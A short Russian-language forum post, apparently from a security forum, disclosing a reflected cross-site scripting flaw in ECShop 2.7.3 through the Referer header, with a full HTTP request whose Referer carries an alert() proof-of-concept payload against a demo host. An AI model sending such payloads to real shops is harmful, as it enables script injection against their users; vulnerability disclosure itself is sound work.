12.05.2014, 16:17
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
ECShop V2.7.3
Официальный сайт http://ecshop.com (разработана в Поднебесной)
Исследовал на демо-версии.
passive XSS (reflected) в Referer
Отправляем пакет:
Сообщение от None
GET /user.php HTTP/1.1
Host: ecshop-273-1106.chinascript.ru
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
">alert('Antichat')
Connection: keep-alive
|
|
|